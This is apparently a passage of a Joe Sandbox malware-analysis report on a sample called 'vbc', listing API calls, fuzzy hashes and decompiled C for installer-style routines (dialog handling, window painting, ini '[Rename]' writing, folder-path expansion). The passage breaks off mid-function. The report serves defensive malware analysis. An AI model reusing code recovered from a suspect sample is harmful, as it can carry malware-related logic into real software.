                                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                • GlobalFree.KERNEL32(?), ref: 00405340
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                • ShowWindow.USER32(00000000), ref: 004054FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void* _v16;
                                                				struct HWND__* _t56;
                                                				intOrPtr _t69;
                                                				signed int _t75;
                                                				signed short* _t76;
                                                				signed short* _t78;
                                                				long _t92;
                                                				int _t103;
                                                				signed int _t110;
                                                				intOrPtr _t113;
                                                				WCHAR* _t114;
                                                				signed int* _t116;
                                                				WCHAR* _t117;
                                                				struct HWND__* _t118;
                                                
                                                				if(_a8 != 0x110) {
                                                					if(_a8 != 0x111) {
                                                						L13:
                                                						if(_a8 != 0x4e) {
                                                							if(_a8 == 0x40b) {
                                                								 *0x42b234 =  *0x42b234 + 1;
                                                							}
                                                							L27:
                                                							_t114 = _a16;
                                                							L28:
                                                							return E00404500(_a8, _a12, _t114);
                                                						}
                                                						_t56 = GetDlgItem(_a4, 0x3e8);
                                                						_t114 = _a16;
                                                						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                							_v12 = _t103;
                                                							_v16 = _t113;
                                                							_v8 = 0x432ea0;
                                                							if(_t103 - _t113 < 0x800) {
                                                								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                								SetCursor(LoadCursorW(0, 0x7f02));
                                                								_push(1);
                                                								E00404907(_a4, _v8);
                                                								SetCursor(LoadCursorW(0, 0x7f00));
                                                								_t114 = _a16;
                                                							}
                                                						}
                                                						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                							goto L28;
                                                						} else {
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                							}
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                						goto L27;
                                                					} else {
                                                						_t69 =  *0x42c240; // 0x5d51a4
                                                						_t29 = _t69 + 0x14; // 0x5d51b8
                                                						_t116 = _t29;
                                                						if(( *_t116 & 0x00000020) == 0) {
                                                							goto L27;
                                                						}
                                                						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                						E004048E3();
                                                						goto L13;
                                                					}
                                                				}
                                                				_t117 = _a16;
                                                				_t75 =  *(_t117 + 0x30);
                                                				if(_t75 < 0) {
                                                					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                                                				}
                                                				_t76 =  *0x434f38 + _t75 * 2;
                                                				_t110 =  *_t76 & 0x0000ffff;
                                                				_a8 = _t110;
                                                				_t78 =  &(_t76[1]);
                                                				_a16 = _t78;
                                                				_v16 = _t78;
                                                				_v12 = 0;
                                                				_v8 = E00404609;
                                                				if(_t110 != 2) {
                                                					_v8 = E004045CF;
                                                				}
                                                				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                				_push(0x22);
                                                				E00404499(_a4);
                                                				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                				_push(0x23);
                                                				E00404499(_a4);
                                                				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                				_t118 = GetDlgItem(_a4, 0x3e8);
                                                				E004044CE(_t118);
                                                				SendMessageW(_t118, 0x45b, 1, 0);
                                                				_t92 =  *( *0x434f10 + 0x68);
                                                				if(_t92 < 0) {
                                                					_t92 = GetSysColor( ~_t92);
                                                				}
                                                				SendMessageW(_t118, 0x443, 0, _t92);
                                                				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                				 *0x42b234 = 0;
                                                				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                				 *0x42b234 = 0;
                                                				return 0;
                                                			}



















                                                0x0040466a
                                                0x00404797
                                                0x004047f4
                                                0x004047f8
                                                0x004048c5
                                                0x004048c7
                                                0x004048c7
                                                0x004048cd
                                                0x004048cd
                                                0x004048d0
                                                0x00000000
                                                0x004048d7
                                                0x00404806
                                                0x0040480c
                                                0x00404816
                                                0x00404821
                                                0x00404824
                                                0x00404827
                                                0x00404832
                                                0x00404835
                                                0x0040483c
                                                0x00404849
                                                0x0040485a
                                                0x00404860
                                                0x00404868
                                                0x00404876
                                                0x0040487c
                                                0x0040487c
                                                0x0040483c
                                                0x00404886
                                                0x00000000
                                                0x00404891
                                                0x00404895
                                                0x004048a5
                                                0x004048a5
                                                0x004048ab
                                                0x004048b7
                                                0x004048b7
                                                0x00000000
                                                0x004048bb
                                                0x00404886
                                                0x004047a2
                                                0x00000000
                                                0x004047b4
                                                0x004047b4
                                                0x004047b9
                                                0x004047b9
                                                0x004047bf
                                                0x00000000
                                                0x00000000
                                                0x004047e8
                                                0x004047ea
                                                0x004047ef
                                                0x00000000
                                                0x004047ef
                                                0x004047a2
                                                0x00404670
                                                0x00404673
                                                0x00404678
                                                0x00404689
                                                0x00404689
                                                0x00404691
                                                0x00404694
                                                0x00404698
                                                0x0040469b
                                                0x0040469f
                                                0x004046a2
                                                0x004046a5
                                                0x004046a8
                                                0x004046af
                                                0x004046b1
                                                0x004046b1
                                                0x004046bb
                                                0x004046c8
                                                0x004046d2
                                                0x004046d7
                                                0x004046da
                                                0x004046df
                                                0x004046f6
                                                0x004046fd
                                                0x00404710
                                                0x00404713
                                                0x00404727
                                                0x0040472e
                                                0x00404733
                                                0x00404738
                                                0x00404738
                                                0x00404746
                                                0x00404754
                                                0x00404766
                                                0x0040476b
                                                0x0040477b
                                                0x0040477d
                                                0x00000000

                                                APIs
                                                • CheckDlgButton.USER32 ref: 004046F6
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                • GetSysColor.USER32 ref: 00404738
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                • lstrlenW.KERNEL32(?), ref: 00404759
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                • SendMessageW.USER32(00000000), ref: 004047DB
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                • LoadCursorW.USER32 ref: 00404857
                                                • SetCursor.USER32(00000000), ref: 0040485A
                                                • LoadCursorW.USER32 ref: 00404873
                                                • SetCursor.USER32(00000000), ref: 00404876
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: Call$N
                                                • API String ID: 3103080414-3438112850
                                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x434f10;
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                				}
                                                				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406183(void* __ecx) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				long _t12;
                                                				long _t24;
                                                				char* _t31;
                                                				int _t37;
                                                				void* _t38;
                                                				intOrPtr* _t39;
                                                				long _t42;
                                                				WCHAR* _t44;
                                                				void* _t46;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t52;
                                                				void* _t53;
                                                
                                                				_t38 = __ecx;
                                                				_t44 =  *(_t52 + 0x14);
                                                				 *0x430908 = 0x55004e;
                                                				 *0x43090c = 0x4c;
                                                				if(_t44 == 0) {
                                                					L3:
                                                					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                						_t53 = _t52 + 0x10;
                                                						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                						_t48 = _t12;
                                                						 *(_t53 + 0x18) = _t48;
                                                						if(_t48 != 0xffffffff) {
                                                							_t42 = GetFileSize(_t48, 0);
                                                							_t6 = _t37 + 0xa; // 0xa
                                                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                								L18:
                                                								return CloseHandle(_t48);
                                                							} else {
                                                								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                									if(_t49 == 0) {
                                                										_t48 =  *(_t53 + 0x18);
                                                										L16:
                                                										_t24 = _t42;
                                                										L17:
                                                										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                										SetFilePointer(_t48, 0, 0, 0);
                                                										E004060DF(_t48, _t46, _t42 + _t37);
                                                										GlobalFree(_t46);
                                                										goto L18;
                                                									}
                                                									_t39 = _t46 + _t42;
                                                									_t31 = _t39 + _t37;
                                                									while(_t39 > _t49) {
                                                										 *_t31 =  *_t39;
                                                										_t31 = _t31 - 1;
                                                										_t39 = _t39 - 1;
                                                									}
                                                									_t24 = _t49 - _t46 + 1;
                                                									_t48 =  *(_t53 + 0x18);
                                                									goto L17;
                                                								}
                                                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                								_t42 = _t42 + 0xa;
                                                								goto L16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E0040602D(_t44, 0, 1));
                                                					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						goto L3;
                                                					}
                                                				}
                                                				return _t12;
                                                			}



















                                                0x00406183
                                                0x0040618c
                                                0x00406193
                                                0x0040619d
                                                0x004061b1
                                                0x004061d9
                                                0x004061e4
                                                0x004061e8
                                                0x00406208
                                                0x0040620f
                                                0x00406219
                                                0x00406226
                                                0x0040622b
                                                0x00406230
                                                0x00406234
                                                0x00406243
                                                0x00406245
                                                0x00406252
                                                0x00406256
                                                0x004062f1
                                                0x00000000
                                                0x0040626c
                                                0x00406279
                                                0x0040629d
                                                0x004062a1
                                                0x004062c0
                                                0x004062c4
                                                0x004062c4
                                                0x004062c6
                                                0x004062cf
                                                0x004062da
                                                0x004062e5
                                                0x004062eb
                                                0x00000000
                                                0x004062eb
                                                0x004062a3
                                                0x004062a6
                                                0x004062b1
                                                0x004062ad
                                                0x004062af
                                                0x004062b0
                                                0x004062b0
                                                0x004062b8
                                                0x004062ba
                                                0x00000000
                                                0x004062ba
                                                0x00406284
                                                0x0040628a
                                                0x00000000
                                                0x0040628a
                                                0x00406256
                                                0x00406234
                                                0x004061b3
                                                0x004061be
                                                0x004061c7
                                                0x004061cb
                                                0x00000000
                                                0x00000000
                                                0x004061cb
                                                0x004062fc

                                                APIs
                                                • CloseHandle.KERNEL32(00000000), ref: 004061BE
                                                • GetShortPathNameW.KERNEL32 ref: 004061C7
                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                • GetShortPathNameW.KERNEL32 ref: 004061E4
                                                • wsprintfA.USER32 ref: 00406202
                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                • CloseHandle.KERNEL32(00000000), ref: 004062F2
                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                				struct _ITEMIDLIST* _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t44;
                                                				WCHAR* _t45;
                                                				signed char _t47;
                                                				signed int _t48;
                                                				short _t59;
                                                				short _t61;
                                                				short _t63;
                                                				void* _t71;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				short _t81;
                                                				short _t82;
                                                				signed char _t84;
                                                				signed int _t85;
                                                				void* _t98;
                                                				void* _t104;
                                                				intOrPtr* _t105;
                                                				void* _t107;
                                                				WCHAR* _t108;
                                                				void* _t110;
                                                
                                                				_t107 = __esi;
                                                				_t104 = __edi;
                                                				_t71 = __ebx;
                                                				_t44 = _a8;
                                                				if(_t44 < 0) {
                                                					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                                                				}
                                                				_push(_t71);
                                                				_push(_t107);
                                                				_push(_t104);
                                                				_t105 =  *0x434f38 + _t44 * 2;
                                                				_t45 = 0x432ea0;
                                                				_t108 = 0x432ea0;
                                                				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                					_t108 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				_t81 =  *_t105;
                                                				_a8 = _t81;
                                                				if(_t81 == 0) {
                                                					L43:
                                                					 *_t108 =  *_t108 & 0x00000000;
                                                					if(_a4 == 0) {
                                                						return _t45;
                                                					}
                                                					return E0040653D(_a4, _t45);
                                                				} else {
                                                					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                						_t98 = 2;
                                                						_t105 = _t105 + _t98;
                                                						if(_t81 >= 4) {
                                                							if(__eflags != 0) {
                                                								 *_t108 = _t81;
                                                								_t108 = _t108 + _t98;
                                                								__eflags = _t108;
                                                							} else {
                                                								 *_t108 =  *_t105;
                                                								_t108 = _t108 + _t98;
                                                								_t105 = _t105 + _t98;
                                                							}
                                                							L42:
                                                							_t82 =  *_t105;
                                                							_a8 = _t82;
                                                							if(_t82 != 0) {
                                                								_t81 = _a8;
                                                								continue;
                                                							}
                                                							goto L43;
                                                						}
                                                						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                						_t47 =  *_t105;
                                                						_t48 = _t47 & 0x000000ff;
                                                						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                						_t85 = _t84 & 0x000000ff;
                                                						_v28 = _t48 | 0x00008000;
                                                						_t77 = 2;
                                                						_v16 = _t85;
                                                						_t105 = _t105 + _t77;
                                                						_v24 = _t48;
                                                						_v20 = _t85 | 0x00008000;
                                                						if(_a8 != _t77) {
                                                							__eflags = _a8 - 3;
                                                							if(_a8 != 3) {
                                                								__eflags = _a8 - 1;
                                                								if(__eflags == 0) {
                                                									__eflags = (_t48 | 0xffffffff) - _v12;
                                                									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                								}
                                                								L38:
                                                								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                								_t45 = 0x432ea0;
                                                								goto L42;
                                                							}
                                                							_t78 = _v12;
                                                							__eflags = _t78 - 0x1d;
                                                							if(_t78 != 0x1d) {
                                                								__eflags = (_t78 << 0xb) + 0x436000;
                                                								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                							} else {
                                                								E00406484(_t108,  *0x434f08);
                                                							}
                                                							__eflags = _t78 + 0xffffffeb - 7;
                                                							if(__eflags < 0) {
                                                								L29:
                                                								E004067C4(_t108);
                                                							}
                                                							goto L38;
                                                						}
                                                						if( *0x434f84 != 0) {
                                                							_t77 = 4;
                                                						}
                                                						_t121 = _t48;
                                                						if(_t48 >= 0) {
                                                							__eflags = _t48 - 0x25;
                                                							if(_t48 != 0x25) {
                                                								__eflags = _t48 - 0x24;
                                                								if(_t48 == 0x24) {
                                                									GetWindowsDirectoryW(_t108, 0x400);
                                                									_t77 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t77;
                                                									if(_t77 == 0) {
                                                										goto L26;
                                                									}
                                                									_t59 =  *0x434f04;
                                                									_t77 = _t77 - 1;
                                                									__eflags = _t59;
                                                									if(_t59 == 0) {
                                                										L22:
                                                										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                										__eflags = _t61;
                                                										if(_t61 != 0) {
                                                											L24:
                                                											 *_t108 =  *_t108 & 0x00000000;
                                                											__eflags =  *_t108;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                										_a8 = _t61;
                                                										__imp__CoTaskMemFree(_v8);
